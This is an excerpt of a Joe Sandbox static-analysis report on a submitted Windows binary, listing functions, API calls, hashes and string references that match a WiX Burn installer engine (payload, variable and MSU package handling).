                                                            • Opcode ID: 8aa497cc605e5c52fd36da492b875e826e24fb554e5d2cf79b0bf747804c7e2b
                                                            • Instruction ID: b8a6da46ac56c06397f3eaf52ac42fa888a7a56b4bab630f5b73390d10bfca1a
                                                            • Opcode Fuzzy Hash: 8aa497cc605e5c52fd36da492b875e826e24fb554e5d2cf79b0bf747804c7e2b
                                                            • Instruction Fuzzy Hash: 3E01F93160120C6BCB10EF69ED89EABB7ACFBC5315F000165F914D3241D6749D598B58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$comres.dll
                                                            • API String ID: 0-3030269839
                                                            • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                            • Instruction ID: ce002aa06281a1d2e39615d6d98154866878aa9718f1833b7d200cb9bcd41be6
                                                            • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                            • Instruction Fuzzy Hash: CE517A60200B0C5BFB388B6C85967BF2795FB17354F180919E943DBE93D609EE818356
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008AEE77,?,?,00000008,?,?,008AEB17,00000000), ref: 008AF0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 0cdf3df4c72ace68a3533852d09ab1b834b2eb32cae340ad4b917f0be073d577
                                                            • Instruction ID: 11cb98463ccd1955acc5be698aa3edc760ba55d8a7ceb34c85e4f3160b16092f
                                                            • Opcode Fuzzy Hash: 0cdf3df4c72ace68a3533852d09ab1b834b2eb32cae340ad4b917f0be073d577
                                                            • Instruction Fuzzy Hash: 31B16D31210609DFE715CF28C48AB657BE0FF46364F2586A8E999CF6A2C735E991CB40
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0089EC20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: fa606d5f0614ad00a491928ca9b78daf005d0858fd701957231c66d6f739a11b
                                                            • Instruction ID: c3ea6b94a00d60553271041b1e3e00b94c11d00a8c99654a02d7f30b295fb1da
                                                            • Opcode Fuzzy Hash: fa606d5f0614ad00a491928ca9b78daf005d0858fd701957231c66d6f739a11b
                                                            • Instruction Fuzzy Hash: 81518BB1D12609CBEF28DF59D8857AABBF4FB48304F28826AD405EB290E3759D00CF51
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,0089E131), ref: 0089E9E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: bb1d20d7df427f42d438b1c1243cbf864611f93e29bc3c0a941e22540ffdb661
                                                            • Instruction ID: 02bd553614280d062fa51397eedcb3f1b7999704b76047a57a77c5f06a0a4112
                                                            • Opcode Fuzzy Hash: bb1d20d7df427f42d438b1c1243cbf864611f93e29bc3c0a941e22540ffdb661
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbd40b1e8373262c87754e0145e7c329774632329fdf8b5484710b376a492fe0
                                                            • Instruction ID: db57fe3edf3b17de2f281fce51389c7bed1ce2b28f1237d2731f740cfe2ce795
                                                            • Opcode Fuzzy Hash: cbd40b1e8373262c87754e0145e7c329774632329fdf8b5484710b376a492fe0
                                                            • Instruction Fuzzy Hash: 2402A2321095A20BDF2D4A39847007B7BA1FA833B171E47ADD8B6CF5D7DE20E964D660
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                            • Instruction ID: e85ca1d82afb1f79c159b3af735b807e5ac14e619173b0a7038e608ae5d5322e
                                                            • Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                            • Instruction Fuzzy Hash: 5EC166331051A20BFF6D4639847417EFBA1EA933B131A179DD4B2CB9D5EE209535EA20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                            • Instruction ID: 42fb76554b3bc42785bdd30d7fec5f5fac31583b7ea21816ae7e194f0845780a
                                                            • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                            • Instruction Fuzzy Hash: 9DC160331051A20AFF2D4639847407FBBA1AE933B131E179DD4F2CB9D6EE249579DA20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                            • Instruction ID: b3af4f71c4f4d580c54763553f09567bb4210eed12d85ca025ff3c00369ebae7
                                                            • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                            • Instruction Fuzzy Hash: EEC170321051A24BFF6D8639847407EBBA1BA933B171E179DD4F2CB9D5EE209538DE20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                            • Instruction ID: 5a444adee75ec17ff7e14104dd36af70f650f47eb090e1b55257aa01585674c7
                                                            • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                            • Instruction Fuzzy Hash: 57B183321091A24BFF2E4239847457FBBE1FA933B171A179DD4B2CB9C5EE209535DA20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f09e27e0eeda23b70682a982cfc1457c85862115edde3d88bb9384beb2145ed4
                                                            • Instruction ID: cdbf318b1b79524e71f53bd804e26ef20deddb9a77d15cf7a2f63f29d3a63380
                                                            • Opcode Fuzzy Hash: f09e27e0eeda23b70682a982cfc1457c85862115edde3d88bb9384beb2145ed4
                                                            • Instruction Fuzzy Hash: B4614971600B085EFB389A2C8895BBE63A5FF43704F14491AF942DFE82EA15DE81C356
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00880592
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                            • API String ID: 3535843008-2755343042
                                                            • Opcode ID: 69494649463b55edfb6d1a7dddddd221cf44bf459d3091c62d53ba35e87bc434
                                                            • Instruction ID: 099675ad7e8acdec0cc6f096fa557ba3a7de817dcf02889139720c8f4634c677
                                                            • Opcode Fuzzy Hash: 69494649463b55edfb6d1a7dddddd221cf44bf459d3091c62d53ba35e87bc434
                                                            • Instruction Fuzzy Hash: 09F1FF31A8062AFBCF626664CD46FAA7675FB00764F050124F900FA352CB75ED68EF91
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0087545D,00000000,008BCA9C,00875445,00000000), ref: 0087CEF3
                                                            Strings
                                                            • Failed to get @Hash., xrefs: 0087D1E3
                                                            • Failed to hex decode the Payload/@Hash., xrefs: 0087D1DC
                                                            • Packaging, xrefs: 0087CEC6
                                                            • Hash, xrefs: 0087D0B7
                                                            • SourcePath, xrefs: 0087CFB0
                                                            • LayoutOnly, xrefs: 0087CF8D
                                                            • Failed to to find container: %ls, xrefs: 0087D186
                                                            • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0087D1B9
                                                            • DownloadUrl, xrefs: 0087CFD9
                                                            • payload.cpp, xrefs: 0087CE3F
                                                            • Failed to get @LayoutOnly., xrefs: 0087D197
                                                            • Failed to hex decode @CertificateRootThumbprint., xrefs: 0087D1C0
                                                            • Container, xrefs: 0087CF4B
                                                            • Failed to get @DownloadUrl., xrefs: 0087D1EA
                                                            • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0087D1B2
                                                            • Failed to parse @FileSize., xrefs: 0087D1A1
                                                            • Failed to allocate memory for payload structs., xrefs: 0087CE49
                                                            • CertificateRootThumbprint, xrefs: 0087D07A
                                                            • Failed to get @FilePath., xrefs: 0087D21A
                                                            • Failed to get @CertificateRootThumbprint., xrefs: 0087D1C7
                                                            • Failed to find catalog., xrefs: 0087D1CE
                                                            • Failed to get next node., xrefs: 0087D228
                                                            • Invalid value for @Packaging: %ls, xrefs: 0087D200
                                                            • Failed to get @Container., xrefs: 0087D18D
                                                            • CertificateRootPublicKeyIdentifier, xrefs: 0087D03D
                                                            • Catalog, xrefs: 0087D0EC
                                                            • Failed to get payload node count., xrefs: 0087CE10
                                                            • Failed to select payload nodes., xrefs: 0087CDEB
                                                            • FilePath, xrefs: 0087CEAB
                                                            • Failed to get @Id., xrefs: 0087D221
                                                            • external, xrefs: 0087CF21
                                                            • Payload, xrefs: 0087CDD8
                                                            • Failed to get @FileSize., xrefs: 0087D1AB
                                                            • Failed to get @Packaging., xrefs: 0087D213
                                                            • embedded, xrefs: 0087CF05
                                                            • Failed to get @Catalog., xrefs: 0087D1D5
                                                            • download, xrefs: 0087CEE5
                                                            • Failed to get @SourcePath., xrefs: 0087D1F1
                                                            • FileSize, xrefs: 0087D002
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateCompareProcessString
                                                            • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                            • API String ID: 1171520630-3127305756
                                                            • Opcode ID: ccfd87bbc3e64d1f90e89e4fcf0ff505c6583e29b7631775fd81c22d118bcf0f
                                                            • Instruction ID: 81acd0a0001ba9614eb3b66fde5af4b6c77f9aed8a5f042f31983f091025fb3a
                                                            • Opcode Fuzzy Hash: ccfd87bbc3e64d1f90e89e4fcf0ff505c6583e29b7631775fd81c22d118bcf0f
                                                            • Instruction Fuzzy Hash: 06C1C272D4072AFBCB119A98CC01EADBB74FF04720F258165FA29F7396C764EE419690
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00875445,?,00000000,80070490,?,?,?,?,?,?,?,?,0089C1BF,?,00875445,?), ref: 008784A7
                                                            • LeaveCriticalSection.KERNEL32(00875445,?,?,?,?,?,?,?,?,0089C1BF,?,00875445,?,00875445,00875445,Chain), ref: 00878804
                                                            Strings
                                                            • Type, xrefs: 008785A3
                                                            • Variable, xrefs: 008784B1
                                                            • Failed to get @Type., xrefs: 00878788
                                                            • Failed to get @Hidden., xrefs: 008787E8
                                                            • Persisted, xrefs: 0087854A
                                                            • Failed to get @Persisted., xrefs: 008787E1
                                                            • Initializing string variable '%ls' to value '%ls', xrefs: 0087861A
                                                            • Value, xrefs: 00878565
                                                            • version, xrefs: 0087862C
                                                            • numeric, xrefs: 008785BC
                                                            • Failed to set variant value., xrefs: 0087878F
                                                            • Invalid value for @Type: %ls, xrefs: 00878778
                                                            • Initializing hidden variable '%ls', xrefs: 00878671
                                                            • Failed to set variant encryption, xrefs: 0087879D
                                                            • variable.cpp, xrefs: 008787B9
                                                            • Failed to get variable node count., xrefs: 008784E1
                                                            • Failed to set value of variable: %ls, xrefs: 008787A7
                                                            • string, xrefs: 008785F7
                                                            • Failed to get next node., xrefs: 008787F6
                                                            • Attempt to set built-in variable value: %ls, xrefs: 008787C8
                                                            • Failed to get @Id., xrefs: 008787EF
                                                            • Initializing numeric variable '%ls' to value '%ls', xrefs: 008785E2
                                                            • Failed to find variable value '%ls'., xrefs: 008787D2
                                                            • Hidden, xrefs: 0087852F
                                                            • Failed to get @Value., xrefs: 00878796
                                                            • Failed to insert variable '%ls'., xrefs: 008786C6
                                                            • Initializing version variable '%ls' to value '%ls', xrefs: 00878653
                                                            • Failed to change variant type., xrefs: 008787DA
                                                            • Failed to select variable nodes., xrefs: 008784C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                            • API String ID: 3168844106-1614826165
                                                            • Opcode ID: 865d058479e96a88f43d8f5f960020a04fd56b9ce575007e96de9d0f28d899c2
                                                            • Instruction ID: 1c5d92f8e8ffae4f7a6bfed1aa2c3e8d77c5fd5662f361757142d2ccf6eb7cf0
                                                            • Opcode Fuzzy Hash: 865d058479e96a88f43d8f5f960020a04fd56b9ce575007e96de9d0f28d899c2
                                                            • Instruction Fuzzy Hash: 03B1AD72D80229FBCB159A98CC49EEEBB74FF04750F208250F929F6394CB75DA409B91
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0088BDDC,00000007,?,?,?), ref: 00896D20
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                            • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 0089710F
                                                            • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00897123
                                                            Strings
                                                            • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00896E75
                                                            • Failed to find Windows directory., xrefs: 00896D5F
                                                            • Failed to append SysNative directory., xrefs: 00896D7D
                                                            • Failed to ensure WU service was enabled to install MSU package., xrefs: 00896F2E
                                                            • 2, xrefs: 00896FB3
                                                            • wusa.exe, xrefs: 00896DA0
                                                            • Failed to find System32 directory., xrefs: 00896D95
                                                            • SysNative\, xrefs: 00896D6A
                                                            • Failed to append log path to MSU command-line., xrefs: 00896ED4
                                                            • WixBundleExecutePackageCacheFolder, xrefs: 00896E0B, 0089713B
                                                            • /log:, xrefs: 00896EA2
                                                            • Failed to wait for executable to complete: %ls, xrefs: 0089709E
                                                            • Failed to build MSU path., xrefs: 00896E35
                                                            • Failed to determine WOW64 status., xrefs: 00896D32
                                                            • Failed to get process exit code., xrefs: 0089702C
                                                            • Failed to format MSU install command., xrefs: 00896E5C
                                                            • Failed to append log switch to MSU command-line., xrefs: 00896EB6
                                                            • Failed to format MSU uninstall command., xrefs: 00896E89
                                                            • Failed to get cached path for package: %ls, xrefs: 00896DFC
                                                            • Failed to CreateProcess on path: %ls, xrefs: 00896F9A
                                                            • "%ls" "%ls" /quiet /norestart, xrefs: 00896E48
                                                            • msuengine.cpp, xrefs: 00896F8D, 00897022, 0089704A
                                                            • Failed to get action arguments for MSU package., xrefs: 00896DD6
                                                            • Bootstrapper application aborted during MSU progress., xrefs: 00897054
                                                            • D, xrefs: 00896F3B
                                                            • Failed to allocate WUSA.exe path., xrefs: 00896DB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                            • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                            • API String ID: 1400713077-4261965642
                                                            • Opcode ID: b4b438ea40f5e88ddb961f4c122f83ffbcee19de9f3ca0539cd27c3de5ce6c3f
                                                            • Instruction ID: 501e39a89d002083337b3dbb4655377c6a243a51fc9fe54bcb25a713ae350e99
                                                            • Opcode Fuzzy Hash: b4b438ea40f5e88ddb961f4c122f83ffbcee19de9f3ca0539cd27c3de5ce6c3f
                                                            • Instruction Fuzzy Hash: A3D1AE71A4070AAAEF11BFA8CC85FAEBBB8FF14304F144039F614E2251E7B5D9549B51
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 008B755D
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7726
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B77C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
